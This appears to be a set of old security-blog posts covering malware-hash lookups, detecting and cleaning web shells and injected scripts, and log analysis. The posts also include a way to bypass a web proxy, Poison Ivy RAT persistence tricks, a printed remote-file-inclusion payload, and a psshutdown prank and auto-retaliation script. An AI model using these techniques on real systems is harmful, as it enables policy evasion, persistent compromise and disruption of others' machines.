#Path to your md5sum app to verify it is not compromised. I got the hash from a new install on fedora 12.
wmd5sum=/usr/bin/md5sum

md5sum /usr/bin/md5sum > .tmp
mverify=`cut -f 1 -d ‘ ‘ .tmp`
if [$mverify == 019329f334fa7ef6116ad1a24271c8da ] then
echo “Your md5 hash matches”
else
echo ” Your md5sum hash is not right, Please verify it before continuing. Press CTRL+C now to exit”
fi
rm -Rf .tmp
# I strongly urge you to make sure your md5 application is not compromised or the rest of this script is useless.
Sleep 20

#Get a list of file to analyze and get their hash
ls $inPath > files.txt
for vfiles in $(cat files.txt)
do
cd $inPath
md5sum $vfiles >> hashes
sort hashes | uniq > $inPath/hashes.txt
done
#Clean up my files
cat $inPath/hashes.txt | grep -v hashes >> .tmp; mv .tmp $inPath/hashes.txt
cat $inPath/hashes.txt | grep -v md5 >> .tmp; mv .tmp $inPath/hashes.txt
cat $inPath/hashes.txt | grep -v clean >> .tmp; mv .tmp $inPath/hashes.txt

#Format file to submit to http://www.team-cymru.org as a batch
cut -f 1 -d ‘ ‘ $inPath/hashes.txt >> $inPath/md5hash.txt
cut -f 3 -d ‘ ‘ $inPath/hashes.txt >> $inPath/md5name.txt
echo “begin”| cat – $inPath/md5hash.txt > .tmp && mv .tmp $inPath/md5hash.txt
echo end >> $inPath/md5hash.txt
rm -Rf $inPath/hashes.txt

#Send batch request o the Malware Hash Registry (I Love netcat)
nc hash.cymru.com 43 < $inPath/md5hash.txt > $inPath/md5results.txt

#Clean up response and format it
cat $inPath/md5results.txt | grep -v “#” >> .bk; mv .bk $inPath/md5results.txt
paste $inPath/md5name.txt $inPath/md5results.txt > $inPath/results.txt
#cat $inPath/results.txt
cat $inPath/md5hash.txt | grep -v “begin” >> .tmp; mv .tmp $inPath/md5hash.txt
cat $inPath/md5hash.txt | grep -v “end” >> .tmp; mv .tmp $inPath/md5hash.txt

#Dirty web scraper and formating (site may be out of date)
for whashes in $(cat $inPath/md5hash.txt)
do
wget –random-wait http://www.malwarehash.com/result.php?hash=$whashes -O $whashes
if grep “INFECTED” $whashes > /dev/null; then
cat $whashes | grep -m 1 a-squared >> $inPath/.tmp
cat $whashes | grep -m 1 “Avira AntiVir” >> $inPath/.tmp
cat $whashes | grep -m 1 “Avast<” >> $inPath/.tmp
cat $whashes | grep -m 1 AVG >> $inPath/.tmp
cat $whashes | grep -m 1 BitDefender >> $inPath/.tmp
cat $whashes | grep -m 1 ClamAV >> $inPath/.tmp
cat $whashes | grep -m 1 Comodo >> $inPath/.tmp
cat $whashes | grep -m 1 “Dr.Web” >> $inPath/.tmp
cat $whashes | grep -m 1 Ewido >> $inPath/.tmp
cat $whashes | grep -m 1 F-PROT >> $inPath/.tmp
cat $whashes | grep -m 1 “G DATA” >> $inPath/.tmp
cat $whashes | grep -m 1 IkarusT3 >> $inPath/.tmp
cat $whashes | grep -m 1 Kaspersky >> $inPath/.tmp
cat $whashes | grep -m 1 McAfee >> $inPath/.tmp
cat $whashes | grep -m 1 “Malware Hash Registry” >> $inPath/.tmp
cat $whashes | grep -m 1 NOD32 >> $inPath/.tmp
cat $whashes | grep -m 1 Norman >> $inPath/.tmp
cat $whashes | grep -m 1 Panda >> $inPath/.tmp
cat $whashes | grep -m 1 “QuickHeal” >> $inPath/.tmp
cat $whashes | grep -m 1 “Solo Antivirus” >> $inPath/.tmp
cat $whashes | grep -m 1 Sophos >> $inPath/.tmp
cat $whashes | grep -m 1 TrendMicro >> $inPath/.tmp
cat $whashes | grep -m 1 VBA32 >> $inPath/.tmp
cat $whashes | grep -m 1 “VirusBuster” >> $inPath/.tmp
#More Cleaning and report creation.
sed -f $inPath/clean $inPath/.tmp > $inPath/.tmp1; mv $inPath/.tmp1 $inPath/$whashes
rm -Rf .tmp .tmp1
echo “Results from MalwareHash.com” >> $inPath/final_report.txt
echo ” ——————————————————” >> $inPath/final_report.txt
echo “$whashes : ” >> $inPath/final_report.txt
echo ” ——————————————————” >> $inPath/final_report.txt
cat $inPath/$whashes >> $inPath/final_report.txt
echo ” ——————————————————” >> $inPath/final_report.txt
else
echo “Results from MalwareHash.com” >> $inPath/final_report.txt
echo “NO RESULTS FOUND for: $whashes” >> $inPath/final_report.txt
echo ” ——————————————————” >> $inPath/final_report.txt
fi
rm -Rf $inPath/$whashes
rm -Rf $inPath/md5*
rm -Rf $inPath/hashes
done
cat $inPath/results.txt | cat – $inPath/final_report.txt > .tmp && mv .tmp $inPath/final_report.txt
echo “Results from The Malware Hash Registry” | cat – $inPath/final_report.txt > .tmp && mv .tmp $inPath/final_report.txt
mail -s”Malware” me@me.com < final_report.txt

Part 2 the sed script:

Copy this code and put it in a file called clean located in the folder that has the files you want to analyze and chmod it so the script can read it.

s/<tr><th>/AV Name:/
s/<tr><th width=”150″>/AV Name:/
s/<\/th><td width=”83″>/ Sig Version:/
s/<\/td><td width=”100″>/ Engine Version:/
s/<\/td><td width=”116″>/ Engine Version:/
s/<\/th> <td width=”83″>/ Sig Version:/
s/<\/td> <td width=”116″>/ Engine Version:/
s/<\/t<td width=”213″><font color=”#336600″ size=”3″>-/ Virus Name: Nothing Found/
s/<\/t<td width=”213″><font color=”#336600″ size=”3″>-/ Virus Name: Nothing Found/
s/<\/td><td width=”213″> <font color=”#336600″ size=”3″>-/ Virus Name: Nothing Found/
s/<\/td><td width=”213″> <font color=”#CC0000″ size=”2″>/ Virus Name: /
s/<\/td><td width=”213″><font color=”#CC0000″ size=”2″>/ Virus Name: /
s/<\/td><td width=”190″> <font color=”#CC0000″ size=”2″>/ Virus Name: /
s/<\/td> <td width=”213″> <font color=”#336600″ size=”3″>-/ Virus Name: Nothing Found/
s/<\/td> <td width=”213″> <font color=”#CC0000″ size=”2″>/ Virus Name: /
s/<\/font><\/td><//
s/\/tr>//
s/<\/font><\/t//
s/<\/font> <//
s/<\/font><\/td> <\/tr//
s/> <\/tr//
s/d>//

Though this methodology is a few years old there is many things that can be done with this. For example we are in the process of writing a tripwire type script that will allow web masters to monitor changes to their sites and to be able to quickly see what was added or modified as well as run it though the process above to search for infections / compromise

As always if you have any questions, comments or concerns please feel free to contact me.

Several months ago an organization I work for implemented BlueCoat Web Proxy but they did not purchase a SSL offload card (required for organizations of our size as a license alone would bog down the rest of the box) or a SSL License. This basically limited the ability for us to filter anything on port 443 unless we knew the IP to set in policy to block since the page was encrypted and we could not decrypt the packet to apply policy.

This limitation creates a security concern because it allows users to use secure protocols to bypass policies. For example most likely your organization has a policy that blocks you from going to internet based email such as Gmail, Yahoo and so on. Well thanks to Gmail for worrying about its user’s security and privacy we can now bypass the BlueCoat Web Proxy. If we go to https://mail.google.com the BlueCoat Web proxy will not see that as a mail site as the URL will be translated to an IP and the packets are encrypted. The other benefit of Gmail is that it will not redirect you to any http it makes sure if you choose https it will not redirect you back to http unlike Yahoo, who redirects you from https at the login to http once you get sent to your mailbox. You can use this method for any https site that does not any time redirect you to http. Side note many sites are not as big as Google so blocking their IP range to stop you from bypassing the BlueCoat web proxy may be easier.

The next issue is since https is required by most companies to be able to carry out a normal work day there is most likely a firewall rule in the organization that reads as follows: source: BlueCoat Web Proxy IP –> destination: Any –> service: http and https.  This rule basically says anyone going out as the web proxy is allowed to any destination on either port 80 or 443. Since the BlueCoat does not act as application proxy meaning it does not analyze the protocols you can use open ports to tunnel any application over. For example since the BlueCoat our organization has (most schools and smaller shops don’t have this either) does not have a SSL offload card and a SSL license and port 443 is open I can take advantage of this to bypass security. For example I have altered my SSH daemon at home to listen on port 443 instead of the default port of 22. This allows me to circumvent both the Web Proxy and the Firewall. This happens for several reasons 1^st because the BlueCoat web proxy cannot analyze the https request, 2^nd the BlueCoat web proxy does not act as a application proxy and third since we are using port 443 and the proxy is configured to intercept port 443 our traffic is leaving the organization as that of the proxy hence making use of the firewall rule to allow us anywhere on the internet on that port.  Many applications that connect to the internet on certain ports can be configured to use whatever port you want. For example it is possible to configure your favorite instant messenger application such as AIM or Yahoo to make connections outbound over port 443 hence bypassing the controls put in place.

Now if you are an administrator of the BlueCoat you can detect people doing this slightly by reviewing the BlueCoat reporter logs. These connections will show as IP addresses and have the category TCP Tunnel. If you look at the IP addresses closely you can get an idea of what they are being used for. To do this you can use tools like arin.net or even Google to search for information related to that IP.  You can also check the employee’s machine for applications that are not installed by your organization. This is a manual process and may cost more man hours then it would cost to purchase a SSL License and if need be a SSL offload card.

This technique may be able to be used on other proxies though I have not tested it on any. As always if you have any comments or questions please feel free to contact me.

Edit Note: I want to thank Tim C: For the update and clarification on the card name and required license.

Some people use Google and Google hacking Database to find their targets and others use their own servers to find potential compromised boxes.

In this quick little update I am going to give you a basic idea on how to use your web server’s access logs to help find compromised hosts on the internet. I will be referencing Linux mostly but the same concept would be doable on a Windows IIS server as well.

On my webhost I am running CPanel for site management / server management. CPanel provides the ability to access the raw logs through the portal. These raw logs are almost the same as the access_logs you would find in a standard Apache setup on Linux. If you are running windows please refer to your IIS access logs and make sure they are configure to display the proper options so you can see the requested URL.

The logs of your web server contain a lot of useful information. It can help you diagnose site and server issues, help to see the type of traffic you are getting (ideal for SEO and marketing), help pin point possible attacks against your sites as well as slew of other bits of useful information.

But we are going to use this article to discuss using them to find potential compromised hosts.

Let’s take a look at a sample log:

72.x.x.x – - [26/Jan/2010:04:36:31 -0600] “GET /feed/ HTTP/1.1″ 304 – “-” “Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 5 subscribers; feed-id=16402550693898658203)”

76.12.124.76 – - [26/Jan/2010:04:40:38 -0600] “GET /?DOCUMENT_ROOT=http://site_blanked.com/osCommerce/catalog/images/baner.txt?? HTTP/1.1″ 301 – “-” “Mozilla/5.0″

76.12.124.76 – - [26/Jan/2010:04:40:38 -0600] “GET /?DOCUMENT_ROOT=http://site_blanked.com/osCommerce/catalog/images/baner.txt?? HTTP/1.1″ 403 82481 “-” “Mozilla/5.0″

193.x.x.x – - [26/Jan/2010:04:53:53 -0600] “GET /robots.txt HTTP/1.1″ 200 24 “-” “Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)”

72.x.x.x – - [26/Jan/2010:05:02:49 -0600] “GET /feed/ HTTP/1.1″ 200 73246 “http://www.digitaloffensive.com/feed/” “Mozilla/5.0 (Compatible)”

77.x.x.x – - [26/Jan/2010:05:07:01 -0600] “GET /2009/10/c99-and-variant-php-shell-detection-quarantine-and-removal/insert_adhere_url_here HTTP/1.1″ 404 10329 “-” “Yandex/1.01.001 (compatible; Win16; I)”

92.x.x.x – - [26/Jan/2010:05:30:12 -0600] “GET /2009/09/fun-with-poison-ivy/ HTTP/1.1″ 200 18062 “http://www.google.com/search?hl=en&safe=off&q=poison+ivy+mutex&aq=f&aql=&aqi=&oq=” “Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7 (.NET CLR 3.5.30729)”

As you can see above we have several different visitor types. There are several spiders / bots that came by the site as well as several visitors from search engines such as Google. Though the two entries we want to look at closer are the entries that start with:

76.12.124.76 – - [26/Jan/2010:04:40:38 -0600]

This shows that access was attempted to the URL:

/?DOCUMENT_ROOT=http://site_blanked.com/osCommerce/catalog/images/baner.txt??.

In this attempt the attacker was trying to use the remote file inclusion attack that I mentioned above. If I Google the SRC IP. I find that is a known malicious site used for automated scanning and distribution of malware. Though the part where it says ROOT= ROOT=http://site_blanked.com/osCommerce/catalog/images/baner.txt?? is why you guys are here.  If you visit this URL directly you will see that the attacker uploaded the following defacement code (WARNING:Going to these URL’s may cause damage to your computer) :

<?php /* Fx29ID */ echo(“FeeL”.”CoMz”); die(“FeeL”.”CoMz”); /* Fx29ID */ ?>

Basically this code would get rendered into the remote host via the remote file inclusion defacing the site to show his tag. It will then use the php command die to stop the rest of the page from loading only showing their tag.

Now if we were malicious we could use Google or your favorite security site to research known vulnerabilities for osCommerce to compromise the site as well. You could also do additional research on the site to help gain more of a idea of how the attack was carried out and maybe even the version of the software they are running be it osCommerce or something else like phpBB.

Though since we are good folks we will contact the site owners and let them know about the compromise. We also blocked the blocked the source IP address as well.

If you want to quickly analyze your logs for things like this I would suggest using a little command line fu on your favorite Linux distribution. For example:

cat /var/log/httpd/access_log | grep *.txt | grep –v robots.txt

This will display all the access attempts that have .txt and not any attempts for robots.txt.

As always I hope this provided you with some useful information. If you have any questions please feel free to let us know.

Over a year ago I wrote a post on the Poison Ivy Trojan (Tool) by the team over at http://poisonivy-rat.com. The original post can be found here http://digitaloffensive.genxweb.net/2009/09/fun-with-poison-ivy/. I wanted to take a few minutes to add another function I discovered at the last CCDC that made this tool that much better.

If you read my original post on this tool at the link above you will see in the third paragraph where it says “Screen 3” I mention how you can inject this into processes. Not only does it inject into the process but every time the process is called Poison Ivy is re-executed.  Now this was helpful because most of the kids at the CCDC were expecting to see Poison Ivy used again as it was in the past and they had a good idea on how to find it and stop it. So we had to become craftier then them. So I decided to attach it to the cmd.exe as well as the security tools they were using to monitor our connections such as TCPview and TCPKiller. This allowed Poison Ivy to continue running every time they tried to stop us.

This brings up another good point when ever doing forensics work on a computer that may be infected either check the md5 sum of the tools that you are using on the machine or bring your own tools to run on a non writeable media. This will make sure that you are not causing any additional damage and that the results you are receiving are correct and not altered.

As I play with this more and as it is warranted I will add additional Tips about this powerful RAT. IF you have any questions or concerns please feel free to contact me.

#!/bin/bash
#######################################
## Simple Google Query and web scraper
## Written by Michael LaSalvia
## http://www.digitaloffensive.com
## Created: 1/15/09
#######################################
##Variables
tFile=gmath.txt
oFile=rmath.txt
rm $tFile
echo “If there was a error above this line that is ok”
echo “###################################”
echo “# Press (a) for addition          #”
echo “# Press (s) for subtraction       #”
echo “# Press (m) for multiplication    #”
echo “# Press (d) for division          #”
echo “###################################”

echo -e “What do you want to do:”
read Mmath
case $Mmath in
“a”) dMath=%2B && echo “You chose addition”;;
“s”) dMath=- && echo “You chose subtration”;;
“m”) dMath=* && echo “You chose multiplication”;;
“d”) dMath=/ && echo “You chose divsion”;;
esac

Now that we know what arithmetic the end user wants to do we need to find out what variables they want to use. To do this we do this:

echo -e “Enter first number:”
read nNum1
echo -e “Enter Second number:”
read nNum2

Now that we have all the needed variables comes the fun part. We now need to construct the URL, but since it is Google and they do not allow automated responses we need to make our script look like a real user agent as well. (WARNING: This may break Google’s AUP). To do this we used the following code:

wget –header=”User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)” “http://www.google.com/search?hl=en&safe=off&q=$nNum1$dMath$nNum2″ -q -O $tFile

The user agent we chose to masquerade as was Internet Explorer 8. You will also notice that we outputted the file to a “known” file. This makes the rest of the process much easier and simpler to code.
Now that we have the full page downloaded we need to find just the information we want. To do this I first manually reviewed the source code of the page and notice that no matter what math problem I entered the source code always had the following around each problem EX.

Code: style=”font-size: 138%;”><b>999 + 998 = 1<font size=”-2″> </font>997</b>

So to remove everything except what I wanted I used the following code:

cat $tFile | awk -F “138%\”><b>” {‘print $2′} | awk -F “</b>” {‘print $1′} > $oFile
echo “Your answer is:” && cat $oFile

You will notice that I did not clean the file fully, that is because I noticed that when it was echoed to the terminal the html that was left did not show and instead of sitting there using “sed” to fully clean it up I left it as is.
I hope you have learned something from this. If you have any questions or concerns please feel free to contact me.

Here is a screen shot:

I have updated the WordPress code on the site as well as added WordPress Security scanner to detect malicious files and help to thwart any hack attempts. I have also added a share mod to this site so you can instantly post my posts to Facebook, Twitter, Digg and so on.
Till next time take care.

For those that know me each you I volunteer some of my time to help college students who are interested in Information Security put their knowledge to the test through the CCDC (Collegiate Cyber Defense Competition).

Each year I join other professional penetration testers and security guru’s to fill the role of the “Red Cell”. We become the guys that you learn fear for the next 12 to72 hours depending if it is the regional prelim or regional final CCDC event. We have one purpose and one purpose only to get in to the students fictitious company and cause them to lose points and business.

In the mean time the students are broken down by colleges. The student teams are referred to as the “Blue Cell” and each group has the exact same network that they are working with as well as the exact same business injects they must complete in order to gain points. The students take on the role of a newly hired IT firm as the company had just released all their IT staff for one reason or another and the CEO is demanding the business to continue as normal (Sounds familiar?)

At the end of each event since this is a learning experience for the kids we do a question and answer session to give these students the opportunity to ask us how it was done. What they can do better and so on and so forth.

Now for the first time ever you can see the full length CCDC documentary that was professionally filmed in HD at http://www.youtube.com/user/CyberWATCHcenter.

I make appearances and interviews in several of the videos.

To learn more about the CCDC check the following sites:

http://www.cyberwatchcenter.org/

http://www.nationalccdc.org/

It is no secret that almost all the cell phone companies today allow you to send txt messages to a person’s cell phone for free by means of emailing them a txt. This does not mean the company will not charge the receiver but the sender will not be charged.  To do this all you need is a email client or a web mail client and the following information:

T-Mobile: phonenumber@tmomail.net
Virgin Mobile: phonenumber@vmobl.com
Cingular: phonenumber@cingularme.com
Sprint: phonenumber@messaging.sprintpcs.com
Verizon: phonenumber@vtext.com
Nextel: phonenumber@messaging.nextel.com

For example if I want to txt 717-555-1234 and that user is a Verizon user you would simply put 7175551234@vtext.com in the “To” field and enter a small message in the body. Remember most cell phones are limited to 160 characters and cannot handle all the crazy things a standard email can.

Though an enough on this as you are here to learn about the code and a simple Google and can provide you with more information on the above topic.

Since I rarely try to PHP program I decided to write a PHP e-mailer that basically gave the user the ability to use a web form to send a SMS message to someone through an email.

The URL above will no longer work I removed the file so spammers and script kiddies could not use it.

To follow a long you need to have basic knowledge of PHP and HTML. If you do then this will be simple for you.  To view the code you can download it by click here http://www.digitaloffensive.com/mailer.txt

Section 1: This contains the author’s information as well as a warning about using the script as it is not written securely. This section also contains the die command to stop scrip kiddies from using file include and leaching off the script.

Section 2: Is the actual PHP code this is where I define the variables by using $variableName = $_POST[‘textboxName’]. I use the POST command instead of the GET command as POST is used for tasks that will be done in the background and not displayed to the end user in the URL. In this section I also put basic logic check functionality in. Basically by using “if isset” I am able to define a field to make sure something is inserted before executing the code. If I did not have this in their every time the page loaded it would try to send and fail since no fields are defined by default. The final key element of this section is the “mail” command this is a PHP built in command and will use the “sendmail” application to send mail.

Section 3: This section contains the actual code to make the form. This is the entire html that makes the text boxes and submit button. The key elements here are the names I used for the text box in the “id=”  or in the “name=” field as they tie in directly with the variables in the PHP section.

That covers all the code if you have any questions please feel free to post a comment and I will answer them. I plan to develop security in this app as I sharpen my skills of the PHP language past just searching for vulnerabilities.

Every day I review my web server’s visitor stats and logs and the other day I noticed something odd. I saw a URL that was accessed 35 times from the same exact IP and I did not recognize the file as being a part of Word Press or any static page I have uploaded.  The file was called Photo13.php. While investigating this file I noticed several files with the time stamp of the night before. These new files were a part of the breach. In total there was three files found. The c99 PHP shell and two other scripts 1 was used to drop webmail.exe on to a visitor’s machine and the other was to email passwords from webmail users to the owner.

Before you all jump on me about Word Press and its security flaws let me assure you I try to make sure to keep the core up to date every time there is an available update. I believe the breach was either on the host side, a weak cPanel password of one of my client sites or the twitter plug-in on the Word Press site.  I am personally leading more on the twitter plug-in or the hosts as these sites have been hosted for over two years on another host with the same configurations and there was not an issue until recently. Also today there was an important upgrade warning about the twitter plug-in.

This got me thinking how I can be sure to have removed all copies of c99 PHP shell and its variants that the attacker might have installed and how I can take a more active approach in detecting this shell and others. When I copied the c99 PHP shell to my local machine and viewed the code I noticed that it is encoded in base 64 as many of you already know that. When you decode this you get a compressed file it is not until you decompress the file you can see the actual code. If you are interested in decoding this file I suggest using Google to search for “gzinflate base64_decode”. Though it was encrypted I did notice that the coding was the same for several c99 PHP shells that I found on other peoples sites via Google.

With this information I decided I could reliably detect a potentially infected file by running it through three separate string checks. So I wrote the following shell script: To download the code in a .sh file click here (Word Press messes up the formatting.)

#/bin/bash
##################################################################
### c99 and variant shell detection, quarantine and or removal ###
### Created by: Michael LaSalvia on 10/08/09                   ###
### Site: http://www.digitaloffensive.com                      ###
### Not responsible for your use of this script                ###
##################################################################
#Variables: if you dont know what you are doing leave these as is
txtInfect=/tmp/php.txt
dirSearch=/var/www/
qInfected=/tmp/infected
ck1=/tmp/c99check1.txt
ck2=/tmp/c99check2.txt
ck3=/tmp/c99check3.txt

echo “########################################################”
echo “## Creating needed files and cleaning old check files ##”
echo “## Ignore errors here                                 ##”
echo “########################################################”
mkdir $qInfected
rm -f $ck1 $ck2 $ck3 $txtInfect

echo “########################################################”
echo “### STARTING SEARCH FOR c99 and vairants            ####”
echo “########################################################”

find $dirSearch -name \*.php >> $txtInfect
for c99 in $(cat $txtInfect)
do
if grep “gzinflate” $c99 > /dev/null; then
echo “$c99 is infected **CHECK 1 of 3**”
echo $c99 >> $ck1
for c992 in $(cat $ck1)
do
if grep “’7X1rcxs5kuBnd0T” $c992 > /dev/null; then
echo “$c992 is infected **CHECK 2 of 3**”
echo $c992 >> $ck2
for c993 in $(cat $ck2)
do
if grep “/wxMNVWOra7tTSb4BOrTD7FuM+847ZoXbxU7K2m2Elzg1RYWkhKujJiJa6QaqTwy9X5tCDZ6f77AUoj9XtkXuWQ5ROgowOYpU59wydY/” $c993 > /dev/null; then
echo “$c993 is infected **CHECK 3 of 3**”
echo $c993 >> $ck3
echo -e “##############################################################”
echo -e “## After 3x c99 code has been found in the following files: ##”
cat $ck3.txt
echo -e “##############################################################”
echo -e “#####  Press 1: To delete these files **WARNING**        #####”
echo -e “#####  Press enter: Rename the infected php to .txt      #####”
echo -e “#####  and move it to $qInfected for review           #####”
echo -e “##############################################################”
echo -e “Please enter your choice:    ”
read yChoice
if [ "$yChoice" == 1 ]
then
for rmInfect in $(cat $ck3)
do
rm -f $rmInfect
echo “** $rmInfect has been removed”
done
else
for mvRname in $(cat $ck3)
do
mv $mvRname $mvRname.txt
mv $mvRname.txt $qInfected
echo “$mvRname has been renamed to $mvRname.txt”
echo $mvRname.txt has been moved to $qInfected
done
fi
fi
done
fi
done
fi
done
rm -f $ck1 $ck2 $ck3 $txtInfect

The shell script is based on my worm detection shell script, which can be found here: http://www.digitaloffensive.com/2009/10/removing-a-mass-web-site-infection/. This script basically searches the “PATH” you provide it for all the files on your system with a .php extension and saves them to a file. The script then checks each file that is the list using three nested “for loops”. The first for loop checks for the string “gzinflate” as that is not a common command in most web scripts. If the string is detected it logs the file and path to another file, if there is no possible infection it will end the script. If the string was found the next for loop will search the possible infected files for the string “’7X1rcxs5kuBnd0T” Once again if the string is found it will copy the file path and name to another file and if nothing is detected it will end the script. The last for loop searches for the string “/wxMNVWOra7tTSb4BOrTD7FuM+847ZoXbxU7K2m2Elzg1RYWkhKujJiJa6QaqTwy9X5tCDZ6f77AUoj9XtkXuWQ5ROgowOYpU59wydY/”. If this string is detected it saves the file path and name to another file. You are then prompted to take action against the script. You will have the option to enter “1” to remove all the infected files that were found or you can just press any other key (enter) and it will rename the file to give it a .txt extension so the attacker cannot execute it, it will also move the file to a quarantined folder in your /tmp directory for your review.

If you have any questions, comments or concerns please feel free to post them or contact me.

CODE:

#!/bin/sh
> .tmp
find /home/ -name \*.php >> php.txt
find /home/ -name \*.html >> php.txt
find /home -name \*.htm >> php.txt
for infected in $(cat php.txt)
do
if grep “http://www.domainstat.net/stat.php” $infected > /dev/null; then
echo “$infected is infected now cleaning”
sed -f clean $infected > .tmp ; mv .tmp $infected
echo “$infected cleaned”
else
echo “$infected is not infected: moving on”
fi
done
> php.txt

The below code is the clean script that I reference:
s/< ? echo “<script language=’JavaScript’ type=’text\/javascript’ src=’http:\/\/www.domainstat.net\/stat.php’>< \/script>”; ?>//
s/<script language=’JavaScript’ type=’text\/javascript’ src=’http:\/\/www.domainstat.net\/stat.php’>< \/script>//

The code above is a shell script written to search /home (this was written for a cpanel server, most Linux servers store web files in /var/www/html) for files that have common web extensions.  Once it lists all the files into a file called php.txt it then greps through each file looking for the infectious code. If it finds the code it copies the page to a tmp file, uses sed to remove the infectious code and then renames the tmp file back to the original.

If  you have any questions or concerns please feel free to post a comment.

First off here are a few caveats that I need to mention before I get bombarded by people complaining that it does not always work.

1. This requires a state full connection IE. icmp will not get detected.
2. The connection may get missed if it is only 1 packet IE. Netsend.
3. Since this uses a loop there may be a delay and you may miss the connection.

This all started when last Friday my computer popped up a message saying it was about to reboot and one of my new co workers started laughing at my displeasure so I knew he did something. Turns out he was just learning how to use Pstools to execute commands and other things.  If you do not know what Pstools are I suggest you Google it as they are some powerful free tools written by a security researcher and purchased by Microsoft.  For those that know what Pstools are and are asking yourself why he has admin to my machine in the first place, the answer is simple we are members of the security team we have admin over all machines in the domain (not domain admin) so we can do our job duties when asked. We will leave it at that, knowing that if I was allowed to and able to I would remove everyone from my machine that did not need access to it.

Normally I would have just laughed along with him but I was working on a report and this basically made me pull out all stops. To buy me some time and offer a quick retribution I created a bat file with the following code in it and placed it in his user profile start up.

@echo off

psshutdown.exe -m “HAHA”

Note I did not have to supply the path to the psshutdown command as my co worker was nice enough to make my job easier and put Pstools into his environment for me.

The command above will basically display the message HAHA as it countdowns 20 seconds before shutting down his machine. By placing it in his user profile startup it would shutdown the machine every time he logged in. I did it this way so any one of the team could still log in and fix the machine in case he could not figure this out.

Once this was done I executed the command psshutdown.exe \\HIS_IP –m “HAHA” manually to start the fun.  Once he realized that every time he was to log in his machine was to reboot. I informed him if you want to hack you need to learn how to protect against hacks and how to investigate compromised machines. I told him to think about what is happening and what could be causing it to happen.  After a few tries he finally figured it out and corrected the issues.

This leads me into why I am writing this article and the code that you are probably here to see. After him rebooting me and knowing that it could happen again at any given time I started pondering different ways I could detect and counter future attempts without having to purchase any software or installing any tools from internet.  I knew in Linux I could use the netstat command and grep to find his IP when a connection is made to me and then pipe that IP into another command such as adding it to the host.deny list or to a firewall rule or even going as far as using metaploit to attack him back automatically. But unfortunately we do not run Linux desktop environments so I was stuck with a windows environment and basic knowledge of windows scripting. I find it annoying that I could write a Linux shell script that could take over the world (not really but you get the point) in my sleep but it takes me a few days of research and trial and errors to write a windows batch file. I think most of it has to deal with the fact I just never really needed to do them as often as I have had to do them on Linux and when I have I usually just used Perl or CGYWIN but I degress. So based on what I know I could do on Linux I started to think about what I could do on windows to offer a layer of protection and I came up with this with help from another co-worker:

@echo off

:top

for %%a in (192.168.1.2 192.168.1.3 192.168.1.4) do call :SubRoutine %%a

goto top

:SubRoutine

netstat -an | find “%1″

if “%errorlevel%” NEQ “0″ goto end

echo “ATTACKER DETECTED”

psshutdown.exe -m “HAHAHA your bad” \\%1

goto end

:end

This script will basically continue to run monitoring the netstat command output every second to look for the IP addresses I have supplied to it. If the IP is found it will give error code 0 meaning it was successful and then execute the psshutdown command against that box stopping the attack and shutting down the attacker.

Now I know what you are thinking, this only works if you have admin on their box and you are correct. This also does not assume they are not attacking you and are actually connecting to you for a business need. So let’s first address the issue of you not being admin and what options you are then left with to protect yourself.  Unfortunately the windows firewall is not very useful it takes all or nothing approach and does not allow individual IP or port blocking. It basically says if on and no exception then block everything. So to administrate something like that from a batch file on the fly is not very sufficient.  Actually windows itself truelly lacks the ability to easily and quickly respond. There is no host.deny or Iptables or service.deny like in Linux. You could possibly learn how to use PKI and IPSEC ; and right rules to do that stuff in there based on systems though that is extremely tough for most windows users.

This led me to search on the internet for a way to close connections via the windows command line. Several of the tools I found such as TCPKill or WinTCPKill were automatically deleted by McAfee because they are considered hacking tools. So I continued to look for a tool that would work and was safe for use, not saying those other tools are not safe though McAfee is a requirement here.  The tool I found was CurrPorts by the guys over at http://www.nirsoft.net/utils/cports.html . Using this tool let’s take a look at what the code will now look like:

@echo off

:top

for %%a in (192.168.1.2 192.168.1.3 192.168.1.4) do call :SubRoutine %%a

goto top

:SubRoutine

netstat -an | find “%1″

if “%errorlevel%” NEQ “0″ goto end

echo “ATTACKER DETECTED”

cports.exe /close * * %1 *

goto end

:end

As you can see above we replaced the “psshutdown” command with the “cports.exe” command. The syntax above uses the /close flag which closes established connections. The * * refers to the local host and the source port. The asterisk allows for wildcards. The %1 is the IP address we want to close and the last * is for the remote port. This seems to work 99% of the time. In our testing we noticed that if a person tried to connect to a port this killed the connection. If they did something like an http request there was a chance we missed the connection since it is not on going. We also noticed that it did not catch share access. We did notice it stopped logins, net cat, telnet, ftp, pstools and more.

Here is a screenshot of the attack without getting blocked by my script:

Here is a screenshot of the attack being blocked by my script. As you can see I am sending a “RST” flag to the attacker to reset their connection which basically kills the handshake and connection:

Now that we addressed not having administrator access and still being able to help block unwanted attacks let’s look at extending this script to be able to capture the port as well. This will be useful as you will see shortly.

@echo off

:top

for %%a in (192.168.1.2 192.168.1.3 192.168.1.4) do call :SubRoutine %%a

goto top

:SubRoutine

for /f “tokens=2″ %%a in (‘netstat -an^|find “%1″‘) do set IPnPort=%%a

for /f “tokens=1-2 delims=:” %%b in (‘echo %IPnPort%’) do (

set IP=%%b

set Port=%%c

)

set IPnPort=

if “%IP%”==”" goto end

if “%Port%”==”" goto end

echo ATTACKER DETECTED from %IP% on Port %Port%

cports /close * * %1 %Port%

for %%a in (IP Port) do set %%a=

goto end

:end

The code above allows us to search for the IP address and when the IP is detected it will save the value IP:PORT into the temp variable %IPnPort% it will then run that variable through one more for loop to get the IP and port as two separate variables in this case %%b and %%c which is then turned in the variables %IP% and %Port%. Once we have these two variables we can do a multitude of things. In the sample above we used the variables to specify the IP and port to have cports.exe close. Even though we could of just used an *. In theory we could add another for loop that contained a list of allowed ports and if %Port% was equal to an allowed port it would not kill the connection.

We can also use another third party tool called plink which is part of the putty suite of tools. Plink is a self contained executable that allows you to use the same protocols you find in Putty but via the command line. It also has a very useful flag that allows for a lot of power. The “-m” flag will allow you to send a configuration to a box. For an example we could have our script above use the echo command to write firewall rules to a txt file. We can then use Plink to connect to the firewall and write the rules to the firewall providing an instant protection scheme.  This is extremely helpful for those that run Juniper Netscreen (SSG or earlier) firewalls or CISCO Pix / ASA firewalls. I am not going to cover the syntax for adding rules to the firewalls via the command line for those two firewalls in this paper but I will give you an example. Let’s take the above code and remove the “cports /close” line and add this line instead.

echo “ set %IP% any eq %Port% deny log” >> fw-rules.txt

